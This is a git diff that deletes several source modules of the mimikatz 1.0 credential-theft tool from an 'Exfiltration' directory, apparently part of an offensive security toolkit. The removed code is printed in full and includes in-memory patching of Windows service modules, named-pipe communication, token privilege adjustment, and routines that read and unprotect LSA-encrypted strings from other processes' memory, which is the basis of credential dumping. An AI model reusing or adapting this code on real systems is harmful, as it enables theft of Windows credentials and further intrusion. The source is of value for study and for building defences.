= 2; kOs.build = 0; kOs.isServer = false; kOs.is64 = true; break; - - case WINDOWS_2003_____x86: kOs.majorVersion = 5; kOs.minorVersion = 2; kOs.build = 0; kOs.isServer = true; kOs.is64 = false; break; - case WINDOWS_2003_____x64: kOs.majorVersion = 5; kOs.minorVersion = 2; kOs.build = 0; kOs.isServer = true; kOs.is64 = true; break; - - case WINDOWS_VISTA____x86: kOs.majorVersion = 6; kOs.minorVersion = 0; kOs.build = 0; kOs.isServer = false; kOs.is64 = false; break; - case WINDOWS_VISTA____x64: kOs.majorVersion = 6; kOs.minorVersion = 0; kOs.build = 0; kOs.isServer = false; kOs.is64 = true; break; - - case WINDOWS_2008_____x86: kOs.majorVersion = 6; kOs.minorVersion = 0; kOs.build = 0; kOs.isServer = true; kOs.is64 = false; break; - case WINDOWS_2008_____x64: kOs.majorVersion = 6; kOs.minorVersion = 0; kOs.build = 0; kOs.isServer = true; kOs.is64 = true; break; - - case WINDOWS_SEVEN____x86: kOs.majorVersion = 6; kOs.minorVersion = 1; kOs.build = 0; kOs.isServer = false; kOs.is64 = false; break; - case WINDOWS_SEVEN____x64: kOs.majorVersion = 6; kOs.minorVersion = 1; kOs.build = 0; kOs.isServer = false; kOs.is64 = true; break; - - case WINDOWS_2008r2___x64: kOs.majorVersion = 6; kOs.minorVersion = 1; kOs.build = 0; kOs.isServer = true; kOs.is64 = true; break; - } - - return checkVersion(&kOs); -} - - -bool mod_patch::checkVersion(vector<OS> * vectorValid) -{ - bool reussite = false; - - for(vector<OS>::iterator monOs = vectorValid->begin(); monOs != vectorValid->end() && !reussite; monOs++) - { - reussite = checkVersion(*monOs); - } - - if(!reussite) - (*outputStream) << L"La version du systme d\'exploitation actuelle n\'est pas supporte par cette fonction." << endl; - - return reussite; -} diff --git a/Exfiltration/mimikatz-1.0/modules/mod_patch.h b/Exfiltration/mimikatz-1.0/modules/mod_patch.h deleted file mode 100644 index 1ae901d..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_patch.h +++ /dev/null @@ -1,57 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_system.h" -#include "mod_process.h" -#include "mod_memory.h" -#include "mod_service.h" -#include <iostream> - -class mod_patch -{ -public: - typedef struct _KIWI_OS_CHECK - { - DWORD majorVersion; - DWORD minorVersion; - DWORD build; - bool isServer; - bool is64; - } KIWI_OS_CHECK, *PKIWI_OS_CHECK; - - enum OS - { - WINDOWS_2000_PRO_x86, - WINDOWS_2000_SRV_x86, - - WINDOWS_XP_PRO___x86, - WINDOWS_XP_PRO___x64, - WINDOWS_2003_____x86, - WINDOWS_2003_____x64, - - WINDOWS_VISTA____x86, - WINDOWS_VISTA____x64, - WINDOWS_2008_____x86, - WINDOWS_2008_____x64, - - WINDOWS_SEVEN____x86, - WINDOWS_SEVEN____x64, - WINDOWS_2008r2___x64, - - WINDOWS_8________x86, - WINDOWS_8________x64, - WINDOWS_8_SERVER_x64 - }; - - static bool getFullVersion(DWORD * majorVersion = NULL, DWORD * minorVersion = NULL, DWORD * build = NULL, bool * isServer = NULL, bool * is64 = NULL); - static bool checkVersion(KIWI_OS_CHECK * monOsValide); - static bool checkVersion(OS monOsValide); - static bool checkVersion(vector<OS> * vectorValid); - - static bool patchModuleOfService(wstring serviceName, wstring moduleName, BYTE * patternToSearch, SIZE_T szPatternToSearch, BYTE * patternToPlace, SIZE_T szPatternToPlace, long offsetForPlace = 0); - static bool patchModuleOfPID(DWORD pid, wstring moduleName, BYTE * patternToSearch, SIZE_T szPatternToSearch, BYTE * patternToPlace, SIZE_T szPatternToPlace, long offsetForPlace = 0); -}; diff --git a/Exfiltration/mimikatz-1.0/modules/mod_pipe.cpp b/Exfiltration/mimikatz-1.0/modules/mod_pipe.cpp deleted file mode 100644 index bd62e9e..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_pipe.cpp +++ /dev/null @@ -1,121 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_pipe.h" - -mod_pipe::mod_pipe(wstring pipeName, wstring serveur) : hPipe(INVALID_HANDLE_VALUE), pipePath(L"\\\\") -{ - pipePath.append(serveur); - pipePath.append(L"\\pipe\\"); - pipePath.append(pipeName); -} - -mod_pipe::~mod_pipe(void) -{ - closePipe(); -} - -bool mod_pipe::closePipe() -{ - bool reussite = false; - - if(hPipe != INVALID_HANDLE_VALUE && hPipe) - { - FlushFileBuffers(hPipe); - DisconnectNamedPipe(hPipe); - reussite = CloseHandle(hPipe) == TRUE; - } - return reussite; -} - -bool mod_pipe::readFromPipe(wstring &laReponse) -{ - bool reussite = false; - wchar_t monBuffer[128]; - - bool fSuccess; - DWORD longueurReponse; - laReponse.clear(); - - do - { - fSuccess = ReadFile(hPipe, monBuffer, sizeof(monBuffer), &longueurReponse, NULL) ? true : false; - if (reussite = (fSuccess || GetLastError() == ERROR_MORE_DATA)/* && longueurReponse != 0 */) - { - laReponse.append(monBuffer, longueurReponse / sizeof(wchar_t)); - } - else - { - break; - } - } while (!fSuccess); - - return reussite; -} - -bool mod_pipe::writeToPipe(const wstring &leMessage) -{ - bool reussite = false; - DWORD longueurMessage; - DWORD longueurOctetsEcris; - - longueurMessage = (static_cast<DWORD>(leMessage.size())) * sizeof(wchar_t); - - if (WriteFile(hPipe, leMessage.c_str(), longueurMessage, &longueurOctetsEcris, NULL) && longueurMessage == longueurOctetsEcris) - { - reussite = FlushFileBuffers(hPipe) != 0; - } - return reussite; -} - - -bool mod_pipe::createServer() -{ - bool reussite = false; - - if(!hPipe || hPipe == INVALID_HANDLE_VALUE) - { - hPipe = CreateNamedPipe(pipePath.c_str(), PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT, 1, 0, 0, 30000, NULL); - - if (hPipe && hPipe != INVALID_HANDLE_VALUE) - { - reussite = ConnectNamedPipe(hPipe, NULL) ? TRUE : (GetLastError() == ERROR_PIPE_CONNECTED); - } - else - { - closePipe(); - } - } - return reussite; -} - -bool mod_pipe::createClient() -{ - bool reussite = false; - - if(!hPipe || hPipe == INVALID_HANDLE_VALUE) - { - if (WaitNamedPipe(pipePath.c_str(), NMPWAIT_USE_DEFAULT_WAIT)) - { - hPipe = CreateFile(pipePath.c_str(), GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); - - if (hPipe != INVALID_HANDLE_VALUE) - { - DWORD dwMode = PIPE_READMODE_MESSAGE | PIPE_WAIT; - - if (!(reussite = SetNamedPipeHandleState(hPipe, &dwMode, NULL, NULL) != 0)) - { - closePipe(); - } - } - } - } - return reussite; -} - -bool mod_pipe::isConnected() -{ - return (hPipe && hPipe != INVALID_HANDLE_VALUE); -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/modules/mod_pipe.h b/Exfiltration/mimikatz-1.0/modules/mod_pipe.h deleted file mode 100644 index 69ab9e9..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_pipe.h +++ /dev/null @@ -1,29 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" - -class mod_pipe -{ -private: - HANDLE hPipe; - wstring pipePath; - -public: - mod_pipe(wstring pipeName = L"mimikatz\\kiwi", wstring serveur = L"."); - virtual ~mod_pipe(void); - - bool closePipe(); - - bool readFromPipe(wstring &laReponse); - bool writeToPipe(const wstring &leMessage); - - bool createServer(); - bool createClient(); - - bool isConnected(); -}; - diff --git a/Exfiltration/mimikatz-1.0/modules/mod_privilege.cpp b/Exfiltration/mimikatz-1.0/modules/mod_privilege.cpp deleted file mode 100644 index 34324b6..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_privilege.cpp +++ /dev/null @@ -1,95 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_privilege.h" - -bool mod_privilege::getName(PLUID idPrivilege, wstring * privilegeName) -{ - bool reussite = false; - DWORD tailleRequise = 0; - - if(!LookupPrivilegeName(NULL, idPrivilege, NULL, &tailleRequise) && GetLastError() == ERROR_INSUFFICIENT_BUFFER) - { - wchar_t * monBuffer = new wchar_t[tailleRequise]; - if(reussite = (LookupPrivilegeName(NULL, idPrivilege, monBuffer, &tailleRequise) != 0)) - { - privilegeName->assign(monBuffer); - } - delete[] monBuffer; - } - return reussite; -} - -bool mod_privilege::getValue(wstring * privilegeName, PLUID idPrivilege) -{ - return (LookupPrivilegeValue(NULL, privilegeName->c_str(), idPrivilege) != 0); -} - -bool mod_privilege::get(vector<pair<wstring, DWORD>> *maPrivilegesvector, HANDLE handleProcess) -{ - bool reussite = false; - - HANDLE hToken = INVALID_HANDLE_VALUE; - if(OpenProcessToken((handleProcess == INVALID_HANDLE_VALUE ? GetCurrentProcess() : handleProcess), TOKEN_QUERY /*| STANDARD_RIGHTS_READ*/, &hToken)) - { - DWORD tailleRequise = 0; - BYTE * monBuffer; - - if(!GetTokenInformation(hToken, TokenPrivileges, NULL, 0, &tailleRequise) && GetLastError() == ERROR_INSUFFICIENT_BUFFER) - { - monBuffer = new BYTE[tailleRequise]; - if(reussite = (GetTokenInformation(hToken, TokenPrivileges, monBuffer, tailleRequise, &tailleRequise) != 0)) - { - TOKEN_PRIVILEGES * mesPrivileges = reinterpret_cast<TOKEN_PRIVILEGES *>(monBuffer); - for(DWORD i = 0; i < mesPrivileges->PrivilegeCount; i++) - { - wstring * monPrivilege = new wstring(); - if(getName(&(mesPrivileges->Privileges[i].Luid), monPrivilege)) - { - maPrivilegesvector->push_back(make_pair(*monPrivilege, mesPrivileges->Privileges[i].Attributes)); - } - delete monPrivilege; - } - } - delete[] monBuffer; - } - } - return reussite; -} - -bool mod_privilege::set(vector<pair<wstring, DWORD>> *maPrivilegesvector, HANDLE handleProcess) -{ - bool reussite = false; - - BYTE * monBuffer = new BYTE[FIELD_OFFSET(TOKEN_PRIVILEGES, Privileges[maPrivilegesvector->size()])]; - TOKEN_PRIVILEGES * mesPrivileges = reinterpret_cast<TOKEN_PRIVILEGES *>(monBuffer); - mesPrivileges->PrivilegeCount = static_cast<DWORD>(maPrivilegesvector->size()); - - unsigned int i; - vector<pair<wstring, DWORD>>::iterator monPrivilege; - for(monPrivilege = maPrivilegesvector->begin(), i = 0; (monPrivilege != maPrivilegesvector->end()) && ( i < mesPrivileges->PrivilegeCount) ; monPrivilege++, i++) - { - if(reussite = getValue(&(monPrivilege->first), &(mesPrivileges->Privileges[i].Luid))) - { - mesPrivileges->Privileges[i].Attributes = monPrivilege->second; - } - else - { - break; - } - } - - if(reussite) - { - HANDLE hToken = INVALID_HANDLE_VALUE; - if(reussite = (OpenProcessToken((handleProcess == INVALID_HANDLE_VALUE ? GetCurrentProcess() : handleProcess), /*TOKEN_QUERY |*/ TOKEN_ADJUST_PRIVILEGES, &hToken) != 0)) - { - reussite = (AdjustTokenPrivileges(hToken, false, reinterpret_cast<TOKEN_PRIVILEGES *>(mesPrivileges), 0, NULL, NULL) != 0) && (GetLastError() == ERROR_SUCCESS); - } - } - - delete monBuffer; - return reussite; -} diff --git a/Exfiltration/mimikatz-1.0/modules/mod_privilege.h b/Exfiltration/mimikatz-1.0/modules/mod_privilege.h deleted file mode 100644 index 2d2652f..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_privilege.h +++ /dev/null @@ -1,18 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" - -class mod_privilege -{ -private: - static bool getName(PLUID idPrivilege, wstring * privilegeName); - static bool getValue(wstring * privilegeName, PLUID idPrivilege); - -public: - static bool get(vector<pair<wstring, DWORD>> *maPrivilegesvector, HANDLE handleProcess = INVALID_HANDLE_VALUE); - static bool set(vector<pair<wstring, DWORD>> *maPrivilegesvector, HANDLE handleProcess = INVALID_HANDLE_VALUE); -}; diff --git a/Exfiltration/mimikatz-1.0/modules/mod_process.cpp b/Exfiltration/mimikatz-1.0/modules/mod_process.cpp deleted file mode 100644 index d000f41..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_process.cpp +++ /dev/null @@ -1,473 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_process.h" - -bool mod_process::getList(vector<KIWI_PROCESSENTRY32> * maProcessesvector, wstring * processName) -{ - HANDLE hProcessesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); - if(hProcessesSnapshot != INVALID_HANDLE_VALUE) - { - PROCESSENTRY32 monProcessus; - monProcessus.dwSize = sizeof(PROCESSENTRY32); - - if(Process32First(hProcessesSnapshot, &monProcessus)) - { - do - { - if(!processName || (_wcsicmp(processName->c_str(), monProcessus.szExeFile) == 0)) - { - KIWI_PROCESSENTRY32 monProcessK = { - monProcessus.dwSize, - monProcessus.cntUsage, - monProcessus.th32ProcessID, - monProcessus.th32DefaultHeapID, - monProcessus.th32ModuleID, - monProcessus.cntThreads, - monProcessus.th32ParentProcessID, - monProcessus.pcPriClassBase, - monProcessus.dwFlags, - monProcessus.szExeFile - }; - - maProcessesvector->push_back(monProcessK); - } - } while(Process32Next(hProcessesSnapshot, &monProcessus)); - } - CloseHandle(hProcessesSnapshot); - return true; - } - else - { - return false; - } -} - -bool mod_process::getUniqueForName(KIWI_PROCESSENTRY32 * monProcess, wstring * processName) -{ - bool reussite = false; - - vector<KIWI_PROCESSENTRY32> * mesProcesses = new vector<KIWI_PROCESSENTRY32>(); - - if(getList(mesProcesses, processName)) - { - if(reussite = (mesProcesses->size() == 1)) - { - *monProcess = mesProcesses->front(); - } - } - delete mesProcesses; - return reussite; -} - -bool mod_process::getUniqueModuleForName(KIWI_MODULEENTRY32 * monModule, wstring * moduleName, DWORD * processId) -{ - bool reussite = false; - - vector<KIWI_MODULEENTRY32> * monVecteurDeModule = new vector<KIWI_MODULEENTRY32>(); - if(mod_process::getModulesListForProcessId(monVecteurDeModule, processId)) - { - if(!moduleName) - { - *monModule = *(monVecteurDeModule->begin()); - reussite = true; - } - else - { - for(vector<KIWI_MODULEENTRY32>::iterator leModule = monVecteurDeModule->begin(); leModule != monVecteurDeModule->end(); leModule++) - { - if(_wcsicmp(leModule->szModule.c_str(), moduleName->c_str()) == 0) - { - *monModule = *leModule; - reussite = true; - break; - } - } - } - } - delete monVecteurDeModule; - - return reussite; -} - -bool mod_process::getModulesListForProcessId(vector<KIWI_MODULEENTRY32> * maModulevector, DWORD * processId) -{ - HANDLE hModuleSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32, (processId ? *processId : 0)); - - if(hModuleSnapshot != INVALID_HANDLE_VALUE) - { - MODULEENTRY32 monModule; - monModule.dwSize = sizeof(MODULEENTRY32); - - if(Module32First(hModuleSnapshot, &monModule)) - { - do - { - KIWI_MODULEENTRY32 monModuleK = { - monModule.dwSize, - monModule.th32ModuleID, - monModule.th32ProcessID, - monModule.GlblcntUsage, - monModule.ProccntUsage, - monModule.modBaseAddr, - monModule.modBaseSize, - monModule.hModule, - monModule.szModule, - monModule.szExePath - }; - maModulevector->push_back(monModuleK); - } while(Module32Next(hModuleSnapshot, &monModule)); - } - CloseHandle(hModuleSnapshot); - return true; - } - else - { - return false; - } -} - -bool mod_process::start(wstring * maCommandLine, PROCESS_INFORMATION * mesInfosProcess, bool paused, bool aUsurper, HANDLE leToken) -{ - bool reussite = false; - RtlZeroMemory(mesInfosProcess, sizeof(PROCESS_INFORMATION)); - STARTUPINFO mesInfosDemarrer; - RtlZeroMemory(&mesInfosDemarrer, sizeof(STARTUPINFO)); - mesInfosDemarrer.cb = sizeof(STARTUPINFO); - - wchar_t * commandLine = new wchar_t[maCommandLine->size() + 1]; - maCommandLine->_Copy_s(commandLine, maCommandLine->size(), maCommandLine->size()); - commandLine[maCommandLine->size()] = L'\0'; - - DWORD creationFlag = CREATE_NEW_CONSOLE | (paused ? CREATE_SUSPENDED : NULL); - - if(leToken) - reussite = CreateProcessAsUser(leToken, NULL, commandLine, NULL, NULL, FALSE, creationFlag, NULL, NULL, &mesInfosDemarrer, mesInfosProcess) != 0; - else if(aUsurper) - reussite = CreateProcessWithLogonW(L"mimikatzU", L"mimikatzD", L"mimikatzP", LOGON_NETCREDENTIALS_ONLY, NULL, commandLine, creationFlag, NULL, NULL, &mesInfosDemarrer, mesInfosProcess) != 0; - else - reussite = CreateProcess(NULL, commandLine, NULL, NULL, FALSE, creationFlag, NULL, NULL, &mesInfosDemarrer, mesInfosProcess) != 0; - - delete[] commandLine; - return reussite; -} - -bool mod_process::suspend(DWORD & processId) -{ - bool reussite = false; - - if(PNT_SUSPEND_PROCESS NtSuspendProcess = reinterpret_cast<PNT_SUSPEND_PROCESS>(GetProcAddress(GetModuleHandle(L"ntdll"), "NtSuspendProcess"))) - { - HANDLE monHandle = OpenProcess(PROCESS_SUSPEND_RESUME, false, processId); - if(reussite = (monHandle && monHandle != INVALID_HANDLE_VALUE)) - { - reussite = NT_SUCCESS(NtSuspendProcess(monHandle)); - CloseHandle(monHandle); - } - } - return reussite; -} - -bool mod_process::resume(DWORD & processId) -{ - bool reussite = false; - - if(PNT_RESUME_PROCESS NtResumeProcess = reinterpret_cast<PNT_RESUME_PROCESS>(GetProcAddress(GetModuleHandle(L"ntdll"), "NtResumeProcess"))) - { - HANDLE monHandle = OpenProcess(PROCESS_SUSPEND_RESUME, false, processId); - if(reussite = (monHandle && monHandle != INVALID_HANDLE_VALUE)) - { - reussite = NT_SUCCESS(NtResumeProcess(monHandle)); - CloseHandle(monHandle); - } - } - return reussite; -} - -bool mod_process::stop(DWORD & processId, DWORD exitCode) -{ - bool reussite = false; - - HANDLE monHandle = OpenProcess(PROCESS_TERMINATE, false, processId); - if(reussite = (monHandle && monHandle != INVALID_HANDLE_VALUE)) - { - reussite = (TerminateProcess(monHandle, exitCode) != 0); - CloseHandle(monHandle); - } - return reussite; -} - -bool mod_process::debug(DWORD & processId) -{ - return (DebugActiveProcess(processId) != 0); -} - -bool mod_process::getProcessBasicInformation(PROCESS_BASIC_INFORMATION * mesInfos, HANDLE processHandle) -{ - bool reussite = false; - - if(processHandle == INVALID_HANDLE_VALUE) - processHandle = GetCurrentProcess(); - - if(PNT_QUERY_INFORMATION_PROCESS NtQueryInformationProcess = reinterpret_cast<PNT_QUERY_INFORMATION_PROCESS>(GetProcAddress(GetModuleHandle(L"ntdll"), "NtQueryInformationProcess"))) - { - ULONG sizeReturn; - reussite = NT_SUCCESS(NtQueryInformationProcess(processHandle, ProcessBasicInformation, mesInfos, sizeof(PROCESS_BASIC_INFORMATION), &sizeReturn)) && (sizeReturn == sizeof(PROCESS_BASIC_INFORMATION)); - } - return reussite; -} - -bool mod_process::getAuthentificationIdFromProcessId(DWORD & processId, LUID & AuthentificationId) -{ - bool reussite = false; - - HANDLE handleProcess = OpenProcess(PROCESS_QUERY_INFORMATION , false, processId); - if(handleProcess && handleProcess != INVALID_HANDLE_VALUE) - { - HANDLE handleProc; - if(OpenProcessToken(handleProcess, TOKEN_READ, &handleProc) != 0) - { - DWORD ddNeededSize; - TOKEN_STATISTICS tokenStats; - - if(reussite = (GetTokenInformation(handleProc, TokenStatistics, &tokenStats, sizeof(tokenStats), &ddNeededSize) != 0)) - { - AuthentificationId = tokenStats.AuthenticationId; - } - CloseHandle(handleProc); - } - CloseHandle(handleProcess); - } - - return reussite; -} - -bool mod_process::getPeb(PEB * peb, HANDLE processHandle) -{ - bool reussite = false; - PROCESS_BASIC_INFORMATION * mesInfos = new PROCESS_BASIC_INFORMATION(); - if(getProcessBasicInformation(mesInfos, processHandle)) - { - reussite = mod_memory::readMemory(mesInfos->PebBaseAddress, peb, sizeof(PEB), processHandle); - } - delete mesInfos; - return reussite; -} - -bool mod_process::getIAT(PBYTE ptrBaseAddr, vector<pair<string, vector<KIWI_IAT_MODULE>>> * monIAT, HANDLE handleProcess) -{ - bool reussite = false; - - BYTE * baseAddr = ptrBaseAddr; - - BYTE * ayIMAGE_DOS_HEADER = new BYTE[sizeof(IMAGE_DOS_HEADER)]; - if(mod_memory::readMemory(baseAddr, ayIMAGE_DOS_HEADER, sizeof(IMAGE_DOS_HEADER), handleProcess)) - { - PIMAGE_DOS_HEADER structDOSHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(ayIMAGE_DOS_HEADER); - if(!IsBadReadPtr(structDOSHeader, sizeof(IMAGE_DOS_HEADER)) && structDOSHeader->e_magic == IMAGE_DOS_SIGNATURE) - { - BYTE * ayIMAGE_NT_HEADERS = new BYTE[sizeof(IMAGE_NT_HEADERS)]; - if(mod_memory::readMemory(baseAddr + structDOSHeader->e_lfanew, ayIMAGE_NT_HEADERS, sizeof(IMAGE_NT_HEADERS), handleProcess)) - { - PIMAGE_NT_HEADERS structPEHeader = reinterpret_cast<PIMAGE_NT_HEADERS>(ayIMAGE_NT_HEADERS); - if(!IsBadReadPtr(structPEHeader, sizeof(IMAGE_NT_HEADERS)) && structPEHeader->Signature == IMAGE_NT_SIGNATURE) - { - if(structPEHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress != NULL && structPEHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size > 0) - { - BYTE * ayIMAGE_IMPORT_DESCRIPTOR = new BYTE[structPEHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size]; - if(mod_memory::readMemory(baseAddr + structPEHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress, ayIMAGE_IMPORT_DESCRIPTOR, structPEHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size, handleProcess)) - { - PIMAGE_IMPORT_DESCRIPTOR structImportDesc = reinterpret_cast<PIMAGE_IMPORT_DESCRIPTOR>(ayIMAGE_IMPORT_DESCRIPTOR); - if(reussite = !IsBadReadPtr(structImportDesc, sizeof(IMAGE_IMPORT_DESCRIPTOR))) - { - while(structImportDesc->Characteristics) - { - DWORD i = 0; - - BYTE * ayIMAGE_THUNK_DATA_HintName = new BYTE[sizeof(IMAGE_THUNK_DATA)]; - BYTE * ayIMAGE_THUNK_DATA_IAT = new BYTE[sizeof(IMAGE_THUNK_DATA)]; - - vector<KIWI_IAT_MODULE> mesImports; - - for(;;) - { - if( - mod_memory::readMemory(baseAddr + structImportDesc->OriginalFirstThunk + i*sizeof(IMAGE_THUNK_DATA), ayIMAGE_THUNK_DATA_HintName, sizeof(IMAGE_THUNK_DATA), handleProcess) - && - mod_memory::readMemory(baseAddr + structImportDesc->FirstThunk + i*sizeof(IMAGE_THUNK_DATA), ayIMAGE_THUNK_DATA_IAT, sizeof(IMAGE_THUNK_DATA), handleProcess) - ) - { - PIMAGE_THUNK_DATA HintNameArray = reinterpret_cast<PIMAGE_THUNK_DATA>(ayIMAGE_THUNK_DATA_HintName); - PIMAGE_THUNK_DATA IATArray = reinterpret_cast<PIMAGE_THUNK_DATA>(ayIMAGE_THUNK_DATA_IAT); - - if(HintNameArray->u1.Function) - { - KIWI_IAT_MODULE imageIAT = { - baseAddr + structImportDesc->FirstThunk + i*sizeof(IMAGE_THUNK_DATA) + FIELD_OFFSET(IMAGE_THUNK_DATA, u1.Function), - reinterpret_cast<PVOID>(IATArray->u1.Function), - 0, - string() - }; - - if(HintNameArray->u1.Ordinal & IMAGE_ORDINAL_FLAG) - { - imageIAT.Ordinal = IMAGE_ORDINAL(HintNameArray->u1.Ordinal); - } - else - { - BYTE monTab[] = {0}; - long offsetToNull; - if(mod_memory::searchMemory(baseAddr + HintNameArray->u1.AddressOfData + FIELD_OFFSET(IMAGE_IMPORT_BY_NAME, Name), 255, monTab, &offsetToNull, sizeof(monTab), true, handleProcess)) - { - BYTE * ayIMAGE_IMPORT_BY_NAME = new BYTE[sizeof(IMAGE_IMPORT_BY_NAME) + offsetToNull]; - if(mod_memory::readMemory(baseAddr + HintNameArray->u1.AddressOfData, ayIMAGE_IMPORT_BY_NAME, sizeof(IMAGE_IMPORT_BY_NAME) + offsetToNull, handleProcess)) - { - PIMAGE_IMPORT_BY_NAME nameImg = reinterpret_cast<PIMAGE_IMPORT_BY_NAME>(ayIMAGE_IMPORT_BY_NAME); - imageIAT.funcName = string(reinterpret_cast<char *>(nameImg->Name)); - } - delete [] ayIMAGE_IMPORT_BY_NAME; - } - } - - mesImports.push_back(imageIAT); - i++; - } - else break; - } - else break; - } - - delete[] ayIMAGE_THUNK_DATA_IAT; - delete[] ayIMAGE_THUNK_DATA_HintName; - - BYTE monTab[] = {0}; - long offsetToNull; - - if(mod_memory::searchMemory(baseAddr + structImportDesc->Name, 255, monTab, &offsetToNull, sizeof(monTab), true, handleProcess)) - { - char * maLib = new char[offsetToNull+1]; - if(mod_memory::readMemory(baseAddr + structImportDesc->Name, maLib, offsetToNull+1, handleProcess)) - { - monIAT->push_back(make_pair(string(maLib), mesImports)); - } - delete [] maLib; - } - - structImportDesc++; - } - } - } - delete[] ayIMAGE_IMPORT_DESCRIPTOR; - } - } - } - delete[] ayIMAGE_NT_HEADERS; - } - } - delete[] ayIMAGE_DOS_HEADER; - - return reussite; -} - -bool mod_process::getProcessEntryFromProcessId(DWORD processId, KIWI_PROCESSENTRY32 * processKiwi, vector<mod_process::KIWI_PROCESSENTRY32> * mesProcess) -{ - bool reussite = false; - bool tabOk = false; - - vector<mod_process::KIWI_PROCESSENTRY32> * monTab; - - if(!mesProcess) - { - monTab = new vector<mod_process::KIWI_PROCESSENTRY32>(); - tabOk = mod_process::getList(monTab); - } - else - { - monTab = mesProcess; - } - - if(mesProcess || tabOk) - { - for(vector<mod_process::KIWI_PROCESSENTRY32>::iterator monProcess = monTab->begin(); monProcess != monTab->end(); monProcess++) - { - if(reussite = (monProcess->th32ProcessID == processId)) - { - *processKiwi = *monProcess; - break; - } - } - } - - if(!mesProcess) - { - delete monTab; - } - - return reussite; -} - -bool mod_process::getVeryBasicModulesListForProcess(vector<KIWI_VERY_BASIC_MODULEENTRY> * monModuleVector, HANDLE processHandle) -{ - bool reussite = false; - PEB * monPeb = new PEB(); - if(getPeb(monPeb, processHandle)) - { - PEB_LDR_DATA * monLoader = new PEB_LDR_DATA(); - if(mod_memory::readMemory(monPeb->LoaderData, monLoader, sizeof(PEB_LDR_DATA), processHandle)) - { - PBYTE aLire, fin; - LDR_DATA_TABLE_ENTRY monEntry; - for( - aLire = PBYTE(monLoader->InMemoryOrderModulevector.Flink) - FIELD_OFFSET(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks), - fin = (PBYTE) (monPeb->LoaderData) + FIELD_OFFSET(PEB_LDR_DATA, InLoadOrderModulevector); - aLire != fin; - aLire = (PBYTE) monEntry.InMemoryOrderLinks.Flink - FIELD_OFFSET(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks) - ) - { - if(reussite = mod_memory::readMemory(aLire, &monEntry, sizeof(monEntry), processHandle)) - { - KIWI_VERY_BASIC_MODULEENTRY monModule = { - reinterpret_cast<PBYTE>(monEntry.DllBase), - monEntry.SizeOfImage, - getUnicodeStringOfProcess(&monEntry.BaseDllName, processHandle) - }; - monModuleVector->push_back(monModule); - } - } - } - delete monLoader; - } - delete monPeb; - return reussite; -} - -wstring mod_process::getUnicodeStringOfProcess(UNICODE_STRING * ptrString, HANDLE process, PLSA_PROTECT_MEMORY unProtectFunction) -{ - wstring maChaine; - BYTE * monBuffer = NULL; - if(getUnicodeStringOfProcess(ptrString, &monBuffer, process, unProtectFunction)) - { - maChaine.assign(mod_text::stringOrHex(monBuffer, ptrString->Length)); - } - if(monBuffer) - delete[] monBuffer; - return maChaine; -} - -bool mod_process::getUnicodeStringOfProcess(UNICODE_STRING * ptrString, BYTE ** monBuffer, HANDLE process, PLSA_PROTECT_MEMORY unProtectFunction) -{ - bool resultat = false; - - if(ptrString->Buffer && (ptrString->Length > 0)) - { - *monBuffer = new BYTE[ptrString->MaximumLength]; - if(resultat = mod_memory::readMemory(ptrString->Buffer, *monBuffer, ptrString->MaximumLength, process)) - { - if(unProtectFunction) - unProtectFunction(*monBuffer, ptrString->MaximumLength); - } - } - return resultat; -}
